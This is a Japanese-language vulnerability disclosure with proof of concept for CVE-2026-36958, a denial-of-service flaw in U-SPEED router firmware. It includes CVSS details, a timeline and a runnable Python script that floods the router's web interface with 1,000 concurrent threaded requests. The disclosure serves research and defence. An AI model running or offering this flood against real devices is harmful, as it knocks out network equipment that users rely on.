
CVE-2026-36958の概念実証。U-SPEEDルーターのファームウェアにおけるサービス拒否(DoS)脆弱性で、同時HTTPリクエストによりリソースを枯渇させ、Webインターフェースが応答不能になります。
CVE ID: CVE-2026-36958 日付: 2026-04-29 発見者: Kirubel Solomne ベンダー: U-SPEED 製品: U-SPEED ルーター ファームウェアバージョン: V1.0.0 CWE: CWE-400 - 制御されないリソース消費
U-SPEED ルーターのファームウェア V1.0.0 はサービス拒否に対して脆弱です。Web管理インターフェース上のランダムまたは存在しないエンドポイントに対して大量の同時HTTPリクエストを送信することで、攻撃者は組み込みの Boa HTTP サーバーのシステムリソースを枯渇させることができます。これにより、ルーターのWebインターフェースが応答不能になり、通常の動作を復元するには手動での再起動が必要になる場合があります。
CVSS v3.1 スコア: 7.5 (高)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| メトリック | 値 |
|---|
| 攻撃元 | ネットワーク |
| 攻撃の複雑さ | 低 |
| 必要な権限 | なし |
| ユーザー操作 | なし |
| 機密性への影響 | なし |
| 完全性への影響 | なし |
| 可用性への影響 | 高 |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router web interface is still responsive.")
期待される動作: サーバーは同時接続を適切に処理する必要があります。 実際の動作: Webインターフェースが応答不能になり、手動での再起動が必要になります。
| 日付 | イベント |
|---|---|
| 2026-04-29 | 脆弱性を発見 |
| 2026-04-29 | MITRE に報告 |
| 2026-04-29 | CVE-2026-36958 が割り当てられる |
| 2026-04-29 | 公開開示 |